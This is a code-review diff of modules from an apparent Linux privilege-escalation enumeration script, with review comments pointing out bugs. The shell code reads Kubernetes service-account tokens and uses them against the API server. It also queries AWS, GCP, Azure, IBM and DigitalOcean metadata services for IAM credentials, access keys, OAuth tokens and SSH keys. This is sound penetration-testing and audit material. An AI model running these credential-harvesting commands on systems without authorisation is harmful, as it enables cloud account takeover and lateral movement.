lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g"
# Additional container runtime checks
print_list "Container runtime sockets .. "$NC
(find /var/run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
print_list "Container runtime configs .. "$NC
(find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g"
# Kubernetes specific checks
if echo "$containerType" | grep -qi "kubernetes"; then
print_3title "Kubernetes Specific Checks"
print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
print_list "Kubernetes service account folder" | sed -${E} "s,.*,${SED_RED},"
ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
print_list "Kubernetes env vars" | sed -${E} "s,.*,${SED_RED},"
(env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
print_list "Current sa user k8s permissions" | sed -${E} "s,.*,${SED_RED},"
kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
"https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
-X 'POST' -H 'Content-Type: application/json' \
--header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
# Additional Kubernetes checks
print_list "Kubernetes API server ...... "$NC
(curl -s -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
print_list "Kubernetes secrets ......... "$NC
(kubectl get secrets 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
print_list "Kubernetes pods ............ "$NC
(kubectl get pods 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
print_list "Kubernetes services ........ "$NC
(kubectl get services 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
print_list "Kubernetes nodes ........... "$NC
(kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
fi
# Interesting files and mounts
print_3title "Interesting Files & Mounts"
print_list "Interesting files mounted ........ "$NC
(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
print_list "Possible entrypoints ........... "$NC
ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
echo ""
fi
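Review bot: the Kubernetes permission fallback builds its request body from `$(echo \"eyJ...\"|base64 -d)`, and the escaped quotes reach `echo` as literal `"` characters, so `base64 -d` is handed a string that begins with a quote and (on GNU coreutils) rejects it as invalid input, leaving `-d` empty; drop the `\"` around the blob. The decoded blob also hard-codes `"spec":{"namespace":"eevee"}`, so the SelfSubjectRulesReview is evaluated for a fixed namespace rather than the one read from the service-account mount a few lines earlier; build the JSON from that value instead. The trailing `sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"` runs without `-${E}`, so `|` is a literal character and the highlight never fires, whereas every other highlight in this block uses `sed -${E}`. Two smaller points: `(env | set)` pipes env's output into `set`, which ignores stdin, so only shell variables are listed (`(env; set)` was probably meant), and the "Dangerous syscalls allowed" label reads `/proc/sys/kernel/yama/ptrace_scope`, which governs ptrace attach rather than syscall filtering, so the label should say ptrace_scope to avoid misreading the finding. Finally, the IPC, PID and UTS checks compare `/proc/self/ns/*` with `/proc/1/ns/*`, but inside a container with its own PID namespace PID 1 is the container's own init, so IPC and UTS will read "No" regardless of whether they are shared with the host and "Yes" only when the PID namespace is shared; a comment stating that limitation would prevent false negatives being read as a hardened configuration, and likewise a non-empty `ip netns list` shows that named namespaces exist, not that the host network namespace is reachable.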

View File

@ -0,0 +1,20 @@
# Title: Container - Am I Containered
# ID: CT_Am_I_contained
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Am I Containered tool
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, execBin
# Global Variables:
# Initial Functions:
# Generated Global Variables: $FAT_LINPEAS_AMICONTAINED
# Fat linpeas: 1
# Small linpeas: 0
if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
print_2title "Am I Containered?"
FAT_LINPEAS_AMICONTAINED="peass{https://github.com/genuinetools/amicontained/releases/latest/download/amicontained-linux-amd64}"
execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
fi
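Review bot: the guard `if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then` uses `$$`, which the shell expands to its own PID, so the tested string is never empty and the block always runs; if a single `$` was intended, note that `FAT_LINPEAS_AMICONTAINED` is only assigned inside the block, so the check would then always be false unless the builder substitutes the variable earlier. Whichever behaviour the builder relies on (the header says `# Fat linpeas: 1`), a comment stating it would save the next reader from "fixing" it, and the `peass{...}` placeholder in the assignment should be called out in the header as build-time syntax, since `# Generated Global Variables:` lists the variable without saying it is rewritten by the builder.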

View File

@ -1,504 +0,0 @@
###########################################
#-----------) Cloud functions (-----------#
###########################################
GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
GCP_BAD_SCOPES="/cloud-platform|/compute"
exec_with_jq(){
if [ "$(command -v jq)" ]; then
$@ | jq 2>/dev/null;
if ! [ $? -eq 0 ]; then
$@;
fi
else
$@;
fi
}
check_gcp(){
is_gcp="No"
if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
is_gcp="Yes"
fi
}
check_do(){
is_do="No"
if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
is_do="Yes"
fi
}
check_ibm_vm(){
is_ibm_vm="No"
if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
curl --connect-timeout 2 "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" > /dev/null 2>&1
if [ "$?" -eq 0 ]; then
IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
is_ibm_vm="Yes"
fi
fi
}
check_aws_ecs(){
is_aws_ecs="No"
if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
is_aws_ecs="Yes";
aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
is_aws_ecs="Yes";
aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
is_aws_ecs="Yes";
fi
if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
fi
}
check_aws_ec2(){
is_aws_ec2="No"
is_aws_ec2_beanstalk="No"
if [ -d "/var/log/amazon/" ]; then
is_aws_ec2="Yes"
EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
else
EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
is_aws_ec2="Yes"
fi
fi
if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
is_aws_ec2_beanstalk="Yes"
fi
}
check_aws_lambda(){
is_aws_lambda="No"
if (env | grep -q AWS_LAMBDA_); then
is_aws_lambda="Yes"
fi
}
check_aws_codebuild(){
is_aws_codebuild="No"
if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
is_aws_codebuild="Yes"
fi
}
check_az_vm(){
is_az_vm="No"
if [ -d "/var/log/azure/" ]; then
is_az_vm="Yes"
elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
is_az_vm="Yes"
fi
}
check_az_app(){
is_az_app="No"
if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
is_az_app="Yes"
fi
}
check_gcp
print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_ecs
print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_ec2
print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_lambda
print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_codebuild
print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_do
print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_ibm_vm
print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_az_vm
print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_az_app
print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
echo ""
if [ "$is_gcp" = "Yes" ]; then
gcp_req=""
if [ "$(command -v curl)" ]; then
gcp_req='curl -s -f -H "X-Google-Metadata-Request: True"'
elif [ "$(command -v wget)" ]; then
gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$gcp_req" ]; then
print_2title "Google CLoud Platform Enumeration"
print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
## GC Project Info
p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
[ "$p_id" ] && echo "Project-ID: $p_id"
p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
[ "$p_num" ] && echo "Project Number: $p_num"
pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
[ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
[ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
# OSLogin Info
osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
[ "$osl_u" ] && echo "OSLogin users: $osl_u"
osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
[ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
[ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
[ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
# Instance Info
inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
[ "$inst_d" ] && echo "Instance Description: "
inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
[ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
[ "$inst_id" ] && echo "Instance ID: $inst_id"
inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
[ "$inst_img" ] && echo "Instance Image: $inst_img"
inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
[ "$inst_mt" ] && echo "Machine Type: $inst_mt"
inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
[ "$inst_n" ] && echo "Instance Name: $inst_n"
inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
[ "$inst_tag" ] && echo "Instance tags: $inst_tag"
inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
[ "$inst_zone" ] && echo "Zone: $inst_zone"
inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
[ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
[ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
[ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
[ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
[ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
[ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
echo ""
print_3title "Interfaces"
for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== "
done
echo ""
print_3title "User Data"
echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
echo ""
echo ""
print_3title "Service Accounts"
for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
echo " ============== "
done
fi
fi
if [ "$is_aws_ecs" = "Yes" ]; then
print_2title "AWS ECS Enumeration"
aws_ecs_req=""
if [ "$(command -v curl)" ]; then
aws_ecs_req='curl -s -f'
elif [ "$(command -v wget)" ]; then
aws_ecs_req='wget -q -O -'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$aws_ecs_metadata_uri" ]; then
print_3title "Container Info"
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
echo ""
print_3title "Task Info"
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
echo ""
else
echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
fi
if [ "$aws_ecs_service_account_uri" ]; then
print_3title "IAM Role"
exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
echo ""
else
echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
fi
fi
if [ "$is_aws_ec2" = "Yes" ]; then
print_2title "AWS EC2 Enumeration"
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl)" ]; then
aws_req="curl -s -f -H '$HEADER'"
elif [ "$(command -v wget)" ]; then
aws_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$aws_req" ]; then
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
echo ""
print_3title "Account Info"
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
echo ""
print_3title "Network Info"
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
echo "Mac: $mac"
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
echo ""
done
echo ""
print_3title "IAM Role"
exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
echo "Role: $role"
exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
echo ""
done
echo ""
print_3title "User Data"
eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
echo ""
echo "EC2 Security Credentials"
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
fi
fi
if [ "$is_aws_lambda" = "Yes" ]; then
print_2title "AWS Lambda Enumeration"
printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
printf "Region: "; env | grep AWS_REGION
printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
printf "Session token: "; env | grep AWS_SESSION_TOKEN
printf "Security token: "; env | grep AWS_SECURITY_TOKEN
printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
fi
if [ "$is_aws_codebuild" = "Yes" ]; then
print_2title "AWS Codebuild Enumeration"
aws_req=""
if [ "$(command -v curl)" ]; then
aws_req="curl -s -f"
elif [ "$(command -v wget)" ]; then
aws_req="wget -q -O -"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
echo "The addresses are in /codebuild/output/tmp/env.sh"
fi
if [ "$aws_req" ]; then
print_3title "Credentials"
CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
print_3title "Container Info"
METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
fi
fi
if [ "$is_do" = "Yes" ]; then
print_2title "DO Droplet Enumeration"
do_req=""
if [ "$(command -v curl)" ]; then
do_req='curl -s -f '
elif [ "$(command -v wget)" ]; then
do_req='wget -q -O - '
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$do_req" ]; then
URL="http://169.254.169.254/metadata"
printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
fi
fi
if [ "$is_ibm_vm" = "Yes" ]; then
print_2title "IBM Cloud Enumeration"
if ! [ "$IBM_TOKEN" ]; then
echo "Couldn't get the metdata token:("
else
TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
ACCEPT_HEADER="Accept: application/json"
URL="http://169.254.169.254/latest/meta-data"
ibm_req=""
if [ "$(command -v curl)" ]; then
ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
elif [ "$(command -v wget)" ]; then
ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$ibm_req" ]; then
print_3title "Instance Details"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
print_3title "Keys and User data"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
print_3title "Placement Groups"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
print_3title "IAM credentials"
exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
fi
fi
fi
if [ "$is_az_vm" = "Yes" ]; then
print_2title "Azure VM Enumeration"
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
az_req=""
if [ "$(command -v curl)" ]; then
az_req="curl -s -f -H '$HEADER'"
elif [ "$(command -v wget)" ]; then
az_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$az_req" ]; then
print_3title "Instance details"
exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
print_3title "Load Balancer details"
exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
print_3title "Management token"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
print_3title "Graph token"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
print_3title "Vault token"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
print_3title "Storage token"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi
fi
if [ "$check_az_app" = "Yes" ]; then
print_2title "Azure App Service Enumeration"
echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
HEADER="secret:$IDENTITY_HEADER"
az_req=""
if [ "$(command -v curl)" ]; then
az_req="curl -s -f -H '$HEADER'"
elif [ "$(command -v wget)" ]; then
az_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$az_req" ]; then
print_3title "Management token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
print_3title "Graph token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
print_3title "Vault token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
print_3title "Storage token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi
fi
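Review bot: this removes the monolithic cloud block, so its known defects should be fixed in the replacement modules rather than moved along with the code. In particular `if [ "$check_az_app" = "Yes" ]; then` tests the function name instead of `$is_az_app`, so the Azure App Service enumeration could never run; `wget -q -O - -H '$HEADER'` in the EC2, IBM and Azure VM branches passes `-H`, which for wget means `--span-hosts`, not a request header, so the wget fallbacks never sent the metadata token (the new Azure Automation module already uses `--header`, which is the right form); `[ "$inst_d" ] && echo "Instance Description: "` drops the value it just fetched; and `print_3title "SSM Runnig"` has a typo. The unconditional `jq` calls in the DO Droplet section are also worth a guard wherever that section is re-homed, since `exec_with_jq` exists for that purpose.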

View File

@ -0,0 +1,46 @@
# Title: Cloud - Azure Automation Account
# ID: CL_Azure_automation_account
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Azure Automation Account Service Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_az_automation_acc, exec_with_jq, print_2title, print_3title
# Global Variables: $is_az_automation_acc,
# Initial Functions: check_az_automation_acc
# Generated Global Variables: $API_VERSION, $HEADER, $az_req
# Fat linpeas: 0
# Small linpeas: 0
